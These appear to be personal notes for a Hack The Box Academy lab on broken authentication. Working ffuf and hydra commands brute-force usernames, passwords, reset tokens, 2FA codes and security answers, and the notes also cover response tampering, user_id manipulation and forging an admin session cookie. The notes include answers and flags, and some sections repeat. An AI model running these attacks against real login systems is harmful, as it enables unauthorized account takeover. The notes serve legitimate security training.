BROKEN AUTHENTICATION

ENUMERATING USERS

Enumerate a valid user on the web application. Provide the username as the answer.

#manually verify whether the web login page will display an error stating that the user name is invalid
root@htb:~$ BROWSER > {targetSite:port}
 username: invalid
 password: invalid
 * error: "Unknown user"

#automate the process of enumerating usernames
root@htb:~$ curl -O https://raw.githubusercontent.com/danielmiessler/SecLists/refs/heads/master/Usernames/xato-net-10-million-usernames.txt
root@htb:~$ ffuf -w xato-net-10-million-usernames.txt -u http://172.17.0.2/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=invalid" -fr "Unknown user"
 * the -w represents the wordlist to use
 * the -u represents the target URL and page
 * the -X POST represents the HTTP method to use
 * the -H is used to add a custom header to the HTTP requests
    - the Content-Type application/x-www-form-urlencoded is often used when sending data in a form submission
 * the -d represents the data
 * the -fr is used to filter out results based on a specific response string
    - If the string "Unknown user" appears in the HTTP response, those results will be excluded from the output

root@htb:~$ ffuf -w xato-net-10-million-usernames.txt -u http://94.237.54.116:49778/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=invalid" -fr "Unknown user"
 * cookster

BRUTE-FORCING PASSWORDS

What is one prominent issue with passwords?

password reuse

What is the password of the user 'admin'?

01.USER ENUMERATION
#manually verify whether the web login page will display an error stating that the user name is invalid
root@oco:~$ BROWSER > {targetSite:port}
 username: invalid
 password: invalid
 * error: "Unknown user"

#automate the process of enumerating usernames
root@oco:~$ curl -O https://raw.githubusercontent.com/danielmiessler/SecLists/refs/heads/master/Usernames/xato-net-10-million-usernames.txt
root@oco:~$ ffuf -w xato-net-10-million-usernames.txt -u http://172.17.0.2/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=invalid" -fr "Unknown user"
 * the -w represents the wordlist to use
 * the -u represents the target URL and page
 * the -X POST represents the HTTP method to use
 * the -H is used to add a custom header to the HTTP requests
    - the Content-Type application/x-www-form-urlencoded is often used when sending data in a form submission
 * the -d represents the data
 * the -fr is used to filter out results based on a specific response string
    - If the string "Unknown user" appears in the HTTP response, those results will be excluded from the output
    
#after identifying valid usernames, proceed by attempting to brute-force the user's password

02.IDENTIFY ERROR MESSAGE
root@oco:~$ BROWSER > {targetSite:port}
 username field: {arbitraryValue}
 password field: {arbitraryValue}
 * send expected output
 
#identified incorrect credential message
 * unknown user
 * invalid credentials

03.IDENTIFY POST PARAMETERS
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 username field: {arbitraryValue}
 password field: {arbitraryValue}
 * submit the expected user input

BURP > Proxy
 Request
 ... 
 POST /index.php HTTP/1.1
 Host: 83.136.254.158:51572
 Content-Type: application/x-www-form-urlencoded
 Cookie: PHPSESSID=2j030ocgj9kbs0a18lai9m6dvg

 username=test&password=test
 * identified post parameters as username=x&password=x

04.CRAFT CUSTOM PWLIST
#tailor the password to the organization's password list (if known)
 Minimum Length: 10 characters
 Must Include:
  At least one uppercase letter
  At least one lowercase letter
  At least one digit
 
#
root@oco:~$ cp /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt.tar.gz .
root@oco:~$ tar -xf rockyou.txt
root@oco:~$ wc -l rockyou.txt
 * 14344391
root@oco:~$ grep '[[:upper:]]' rockyou.txt | grep '[[:lower:]]' | grep '[[:digit:]]' | grep -E '.{10}' > customPWList.txt
 * the grep '[[:upper:]]' rockyou.txt searches for lines in rockyou.txt that contain at least one uppercase letter.
    - The [[:upper:]] is a POSIX character class that matches any uppercase letter (A-Z).
 * the grep '[[:lower:]]' filters the lines to include only those containing at least one lowercase letter (matched by [[:lower:]]).
 * the grep '[[:digit:]]' filters the output further to include only lines that contain at least one digit (0-9).
    - the [[:digit:]] POSIX character class matches any numeric digit.
 * the grep -E '.{10}' uses the -E option (extended regular expressions) to match lines with 10 or more characters.
    - the pattern .{10} matches any line with at least 10 characters, where . represents any character and {10} specifies at least 10 repetitions.

root@oco:~$ wc -l customPWList.txt
 * 151647

05.FUZZ for the password
root@oco:~$ ffuf -w ./customPWList.txt -u http://83.136.254.158:48961/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=admin&password=FUZZ" -fr "Invalid username" -t 80
 * -t specifies the number of threads to use; default is 40
 * MUST use the error 'invalid user' in ffuf NOT 'invalid credential' error
    - the -fr 'invalid user' works because it removes responses that match a certain regular expression from the output
       - if 'invalid user' is displayed in the response, then it gets discarded from the output
 * Ramirez120992 [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 102ms]

BRUTE-FORCING PASSWORD RESET TOKENS

On what do password recovery functionalities provided by web applications typically rely to allow users to recover their accounts?

one-time reset token

Which flag of seq pads numbers by prepending zeros to make them the same length?

#generate pwResetTokens
root@oco:~$ seq -w 0 9999 > pwResetTokens.txt
 * The -w flag pads all numbers to the same length by prepending zeroes
root@oco:~$ cat pwResetTokens.txt
 0000
 ...
 9999

How many possible values are there for a 6-digit OTP?

#analysis
 * formula for OTP consisting of only 6 digit numbers
    - each digit position can have at most 10 digits which are 0 through 9
    - since there are 6 digit positions, the formula will be
       - 10^6 = 1,000,000 combinations; 0000000 9999999

Takeover another user's account on the target system to obtain the flag.

#identify valid webapp users
#manually verify whether the web login page will display an error stating that the user name is invalid
root@oco:~$ BROWSER > {targetSite:port}
 username: invalid
 password: invalid
 * error: "Invalid username or password"
    - the error msg is case sensitive and MUST be specified exactly as shown when using ffuf, hydra, etc
 
#register a free account IOT identify whether the service uses weak reset tokens
root@oco:~$ BROWSER > {targetSite:port} > Register
 username: {arbitraryValue}
 password: {arbitraryValue}
 ...
 
#issue a password reset request
root@oco:~$ BROWSER > {targetSite:port} > Password Reset
 email: {arbitraryValue}
 ...
 * identify reset page within the page
 
#identify the error value when resetting password
root@oco:~$ BROWSER > {http://94.237.51.215:55891/reset_password.php}
 * The provided token is invalid

#automate the process of enumerating usernames
root@oco:~$ curl -O https://raw.githubusercontent.com/danielmiessler/SecLists/refs/heads/master/Usernames/xato-net-10-million-usernames.txt
root@oco:~$ ffuf -w xato-net-10-million-usernames.txt -u http://94.237.51.215:55891/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=invalid" -fr "Invalid username or password"
 * the -w represents the wordlist to use
 * the -u represents the target URL and page
 * the -X POST represents the HTTP method to use
 * the -H is used to add a custom header to the HTTP requests
    - the Content-Type application/x-www-form-urlencoded is often used when sending data in a form submission
 * the -d represents the data
 * the -fr is used to filter out results based on a specific response string
    - If the string "Unknown user" appears in the HTTP response, those results will be excluded from the output
 
 * assuming there is a user named admin
 
#generate pwResetTokens
root@oco:~$ seq -w 0 9999 > pwResetTokens.txt
 * The -w flag pads all numbers to the same length by prepending zeroes
root@oco:~$ cat pwResetTokens.txt
 0000
 ...
 9999

#assuming there is a password reset request already initiated
root@oco:~$ ffuf -w pwResetTokens.txt -u http://94.237.51.215:55891/reset_password.php?token=FUZZ -fr "The provided token is invalid" -t 120
 * specifying the reset token in the GET-parameter token in the /reset_password.php endpoint will reset the password of the corresponding account enabling account takeover
    - 2653
     
#use the identified password reset token
root@oco:~$ BROWSER > http://94.237.51.215:55891/reset_password.php?token=2653
 * Welcome admin. Please reset your password
 * password: ...
root@oco:~$ BROWSER > http://94.237.51.215:55891
 username: admin
 password: {arbitraryValue}

 * HTB{36da098385e641d54e1b2750721d816e}

BRUTE-FORCING 2FA CODES

Brute-force the admin user's 2FA code on the target system to obtain the flag.

#identify valid webapp users
#manually verify whether the web login page will display an error stating that the user name is invalid
root@oco:~$ BROWSER > {targetSite:port}
 username: invalid
 password: invalid
 * error: "Invalid username or password"
    - the error msg is case sensitive and MUST be specified exactly as shown when using ffuf, hydra, etc

#brute force credentials
root@oco:~$ cp /usr/share/seclists/Usernames/top-usernames-shortlist.txt .
root@oco:~$ cp /usr/share/seclists/Passwords/500-worst-passwords.txt .
root@oco:~$ hydra -L top-usernames-shortlist.txt -P 500-worst-passwords.txt 94.237.61.84 -s 59351 -f http-post-form "/:username=^USER^&password=^PASS^:Invalid username or password." -T 128
 * admin:admin 

#intercept request & response error msg for use with ffuf
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 username field: admin
 password field: admin
 * submit the expected user input
 
#identity session cookie, the target page, and the error msg
BURP > Proxy
 Request
  ...
  GET /2fa.php HTTP/1.1
  Host: 94.237.61.84:59351
  Referer: http://94.237.61.84:59351/
  Cookie: PHPSESSID=f38hf9oc8nm0u0npj4pvn1oqs8
  Connection: close
  ...
  Content-Type: application/x-www-form-urlencoded
 
 * the PHPSESSID cookie is required to associate the TOTP with the authenticated session

BURP > Repeater
 Request
  ...
  GET /2fa.php HTTP/1.1
  Host: 94.237.61.84:59351
  Referer: http://94.237.61.84:59351/
  Cookie: PHPSESSID=f38hf9oc8nm0u0npj4pvn1oqs8
  Connection: close
  ...
  Content-Type: application/x-www-form-urlencoded
 Response
  ...
  Invalid 2FA Code.

#generate tokens
#some target will provide the necessary information regarding OTP. e.g., Welcome admin. Please provide your 4-digit One-Time Password (OTP).
root@oco:~$ seq -w 0 9999 > tokens.txt
 * The -w flag pads all numbers to the same length by prepending zeroes
root@oco:~$ cat pwResetTokens.txt
 0000
 ...
 9999

root@oco:~$ ffuf -w tokens.txt -u http://94.237.61.84:59351/2fa.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -b "PHPSESSID=f38hf9oc8nm0u0npj4pvn1oqs8" -d "otp=FUZZ" -fr "Invalid 2FA" -t 120
 * ...4723  [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 147ms]
    - it is normal to get many hits. That is because the session successfully passed
      the 2FA check after the correct TOTP was supplied during the ffuf fuzzing. Since
      4723 was the first hit, it can be assumed this was the correct TOTP. Afterward, 
      the session is marked as fully authenticated, so ALL REQUESTS using the session
      cookie are redirected to /admin.php.
root@oco:~$ BROWSER > http://94.237.61.84:59351/admin.php
 * HTB{9837b33a1ef678c380addf7ef8a517de}

VULNERABLE PASSWORD RESET

Which city is the admin user from?

#identify valid webapp users
#manually verify whether the web login page will display an error stating that the user name is invalid
root@oco:~$ BROWSER > {targetSite:port}
 username: admin
 password: invalid
 * username=admin&password=invalid
 * error: "Invalid username or password."
    - the error msg is case sensitive and MUST be specified exactly as shown when using ffuf, hydra, etc

#intercept request & response error msg for use with ffuf
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port} > Reset your password
 username field: admin
 * submit the expected user input
 
#identity session cookie, the target page, and the error msg
BURP > Proxy
 Request
  ...
  POST /security_question.php HTTP/1.1
  Host: 94.237.57.27:54385
  Origin: http://94.237.57.27:54385
  Content-Type: application/x-www-form-urlencoded
  Referer: http://94.237.57.27:54385/security_question.php
  Cookie: PHPSESSID=e442r8fnnre805ctkfl9d0cm0e
  Connection: close

  security_response=test
  * Incorrect response.
 
  * the PHPSESSID cookie is required
  
#generate security question wordlist
root@oco:~$ locate *citi*
 /usr/share/seclists/Miscellaneous/security-question-answers/cities.txt
 /usr/share/seclists/Miscellaneous/us-cities.txt
root@oco:~$ cp /usr/share/seclists/Miscellaneous/security-question-answers/cities.txt .
root@oco:~$ cat cities.txt
root@oco:~$  wc -l cities.txt

#craft the ffuf cmds
root@oco:~$ ffuf -w cities.txt -u http://94.237.57.27:54385/security_question.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -b "PHPSESSID=e442r8fnnre805ctkfl9d0cm0e" -d "security_response=FUZZ" -fr "Incorrect response."
 * use "manchester" NOT "Manchester" to answer the academy question; however, use "Manchester" to reset the password
    
#reset the password
root@oco:~$ BROWSER > http://94.237.57.27:54385/index.php
 username: admin
 password: {arbitrary}
 * HTB{d4740b1801d9880ff70de227a54309f0}

Reset the admin user's password on the target system to obtain the flag.

#identify valid webapp users
#manually verify whether the web login page will display an error stating that the user name is invalid
root@oco:~$ BROWSER > {targetSite:port}
 username: admin
 password: invalid
 * username=admin&password=invalid
 * error: "Invalid username or password."
    - the error msg is case sensitive and MUST be specified exactly as shown when using ffuf, hydra, etc

#intercept request & response error msg for use with ffuf
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port} > Reset your password
 username field: admin
 * submit the expected user input
 
#identity session cookie, the target page, and the error msg
BURP > Proxy
 Request
  ...
  POST /security_question.php HTTP/1.1
  Host: 94.237.57.27:54385
  Origin: http://94.237.57.27:54385
  Content-Type: application/x-www-form-urlencoded
  Referer: http://94.237.57.27:54385/security_question.php
  Cookie: PHPSESSID=e442r8fnnre805ctkfl9d0cm0e
  Connection: close

  security_response=test
  * Incorrect response.
 
  * the PHPSESSID cookie is required
  
#generate security question wordlist
root@oco:~$ locate *citi*
 /usr/share/seclists/Miscellaneous/security-question-answers/cities.txt
 /usr/share/seclists/Miscellaneous/us-cities.txt
root@oco:~$ cp /usr/share/seclists/Miscellaneous/security-question-answers/cities.txt .
root@oco:~$ cat cities.txt
root@oco:~$  wc -l cities.txt

#craft the ffuf cmds
root@oco:~$ ffuf -w cities.txt -u http://94.237.57.27:54385/security_question.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -b "PHPSESSID=e442r8fnnre805ctkfl9d0cm0e" -d "security_response=FUZZ" -fr "Incorrect response."
 * use "manchester" NOT "Manchester" to answer the academy question; however, use "Manchester" to reset the password
    
#reset the password
root@oco:~$ BROWSER > http://94.237.57.27:54385/index.php
 username: admin
 password: {arbitrary}
 * HTB{d4740b1801d9880ff70de227a54309f0}

AUTHENTICATION BYPASS: DIRECT ACCESS

Apply what you learned in this section to bypass authentication to obtain the flag.

#
root@oco:~$ locate web-extension*
 /usr/share/seclists/Discovery/Web-Content/web-extensions.txt
root@oco:~$ cp /usr/share/seclists/Discovery/Web-Content/web-extensions.txt .

#identify the extension the site uses
root@oco:~$ ffuf -w web-extensions.txt:FUZZ -u http://94.237.62.184:39910/indexFUZZ
 * .php  [Status: 200, Size: 2971, Words: 638, Lines: 97, Duration: 4328ms]

root@oco:~$ locate *directory-list*
root@oco:~$ cp /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt .

#fuzz for admin pages, etc
root@oco:~$ ffuf -w directory-list-2.3-small.txt:FUZZ -u http://94.237.62.184:39910/FUZZ.php -t 100 -ic
 admin [Status: 302, Size: 14465, Words: 4165, Lines: 429, Duration: 77ms]
 * the output may list different sizes
    - size 0 means no content or empty page
    - size > 0 means the page contains content
    
#verify identified pages
root@oco:~$ curl http://94.237.62.184:39910/admin.php

#intercept requests and test for direct access authentication bypass
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
BURP > Proxy > Requests > right-click > Do intercept > Response to this request > Forward
 Request
  ...
  GET /admin.php HTTP/1.1
  Host: 94.237.62.184:39910
  Cookie: PHPSESSID=e4b4gmh75rbp9k90n2l23rfv39
  Connection: close

BURP > Proxy > Response > Forward
 Response
  ...
  HTTP/1.1 302 Found                      // change this to 200 OK
  Date: Wed, 25 Dec 2024 19:13:30 GMT
  Server: Apache/2.4.59 (Debian)
  Location: index.php
  Connection: close
  
  Modifications...
  HTTP/1.1 200 OK
  
root@oco:~$ BROWSER > http://94.237.62.184:39910/admin.php
 * HTB{913ab2d84b8db21854c696dee1f1db68}

AUTHENTICATION BYPASS: PARAMETER MODIFICATION

Apply what you learned in this section to bypass authentication to obtain the flag.

#
root@oco:~$ seq 1 999 > userID.txt

#intercept requests and identify pertinent info
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
 username field: htb-stdnt
 password field: AcademyStudent!
 * submit expected input
 
 Request
  ...
  GET /admin.php?user_id=183 HTTP/1.1
  Host: 94.237.61.84:59319
  Cookie: PHPSESSID=7l8q454p2j4mc0ul2jonm6ecn3
  Connection: close
  
  * key msg: Could not load admin data. Please check your privileges. 

root@oco:~$ ffuf -w ./userID.txt -u http://94.237.61.84:59319//admin.php?user_id=FUZZ -fr "Could not load admin data. Please check your privileges."
 372 [Status: 200, Size: 14465, Words: 4165, Lines: 429, Duration: 78ms]

  * HTB{63593317426484ea6d270c2159335780}

ATTACKING SESSION TOKENS

A session token can be brute-forced if it lacks sufficient what?

entropy

Obtain administrative access on the target to obtain the flag.

#identify pattern or encoding
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 username field: htb-stdnt
 password field: AcademyStudent!
 * submit the expected user input

BURP > Proxy
 Request
 ...
  POST /index.php HTTP/1.1
  Host: 83.136.254.158:52415
  Origin: http://83.136.254.158:52415
  Content-Type: application/x-www-form-urlencoded
  Referer: http://83.136.254.158:52415/index.php

  username=htb-stdnt&password=AcademyStudent%21
  
 * send to repeater

#send multiple login requests and take note of the session tokens assigned
#try to identify the pattern or if only a portion of the token is random
BURP > Repeater
 Request
 ...
  POST /index.php HTTP/1.1
  Host: 94.237.61.84:50122
  Origin: http://94.237.61.84:50122
  Referer: http://94.237.61.84:50122/

  username=htb-stdnt&password=AcademyStudent%21
 Response
 ...
  HTTP/1.1 302 Found
  Date: Thu, 26 Dec 2024 00:29:27 GMT
  Server: Apache/2.4.59 (Debian)
  Set-Cookie: session=757365723d6874622d7374646e743b726f6c653d75736572
  Location: /admin.php
  ...

root@oco:~$ echo -n 757365723d6874622d7374646e743b726f6c653d75736572 | xxd -r -p
 user=htb-stdnt;role=user

#tamper/forge token
root@oco:~$ echo -n 'user=htb-stdnt;role=admin' | xxd -p
 757365723d6874622d7374646e743b726f6c653d61646d696e
 
#relog while the current session is active/attached or cached
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 username field: htb-stdnt
 password field: AcademyStudent!
 * submit the expected user input
 
BURP > Proxy
 Request
 ...
  GET / HTTP/1.1
  Host: 94.237.61.84:50122
  Cookie: session=757365723d6874622d7374646e743b726f6c653d75736572

 * right-click on the request > Do intercept > Response to this request
 * HTB{d1f5d760d130f7dd11de93f0b393abda}

PreviousLOGIN BRUTE FORCING NextWEB ATTACKS

Last updated 3 months ago